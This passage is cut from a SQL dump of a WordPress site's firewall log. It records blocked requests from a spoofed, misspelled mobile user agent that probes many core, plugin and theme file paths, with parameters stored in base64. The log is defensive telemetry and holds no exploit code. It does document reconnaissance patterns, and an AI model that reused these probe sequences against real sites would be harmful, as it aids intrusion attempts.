User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vcG8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133970,1699932116.934879,1699932116.925500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/plural-forms.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vcGx1cmFsLWZvcm1zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134022,1699932515.713918,1699932515.705200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-renderer.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLXJlbmRlcmVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133971,1699932108.180980,1699932108.171800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/mo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vbW8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134105,1699994943.076541,1699994943.067300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ninja-forms/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133972,1699932103.612655,1699932103.603900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/entry.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vZW50cnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133973,1699932099.880902,1699932099.859200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134021,1699932531.824298,1699932531.802600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLXN0eWxlc2hlZXQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133974,1699932086.225187,1699932086.211000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/php-compat/readonly.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BocC1jb21wYXQvcmVhZG9ubHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133975,1699932082.480302,1699932082.471500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/php-compat/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BocC1jb21wYXQvd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133976,1699932075.440360,1699932075.418500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/js/tinymce/wp-tinymce.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2pzL3RpbnltY2Uvd3AtdGlueW1jZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134020,1699932539.795182,1699932539.782600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133977,1699932004.786712,1699932004.774200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/js/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2pzL3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133978,1699932481.028374,1699932481.018800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/search/class-wp-rest-search-handler.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL3NlYXJjaC9jbGFzcy13cC1yZXN0LXNlYXJjaC1oYW5kbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133979,1699932475.058297,1699932475.048800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL3NlYXJjaC9jbGFzcy13cC1yZXN0LXBvc3Qtc2VhcmNoLWhhbmRsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134106,1699994938.733485,1699994938.724700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/classic/inc/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134019,1699932547.500849,1699932547.491500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL3Byb3ZpZGVycy9jbGFzcy13cC1zaXRlbWFwcy1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133980,1699932468.976647,1699932468.967300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL3NlYXJjaC9jbGFzcy13cC1yZXN0LXBvc3QtZm9ybWF0LXNlYXJjaC1oYW5kbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133981,1699932458.887154,1699932458.878400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2ZpZWxkcy9jbGFzcy13cC1yZXN0LXVzZXItbWV0YS1maWVsZHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134018,1699932553.721420,1699932553.712000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL3Byb3ZpZGVycy9jbGFzcy13cC1zaXRlbWFwcy10YXhvbm9taWVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133982,1699932453.176116,1699932453.154600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2ZpZWxkcy9jbGFzcy13cC1yZXN0LXRlcm0tbWV0YS1maWVsZHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133983,1699932438.923276,1699932438.914000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2ZpZWxkcy9jbGFzcy13cC1yZXN0LXBvc3QtbWV0YS1maWVsZHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133984,1699932433.863021,1699932433.854400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2ZpZWxkcy9jbGFzcy13cC1yZXN0LW1ldGEtZmllbGRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134017,1699932560.083847,1699932560.074300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL3Byb3ZpZGVycy9jbGFzcy13cC1zaXRlbWFwcy11c2Vycy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133985,1699932430.626569,1699932430.604700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2ZpZWxkcy9jbGFzcy13cC1yZXN0LWNvbW1lbnQtbWV0YS1maWVsZHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133986,1699932414.021400,1699932414.012600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 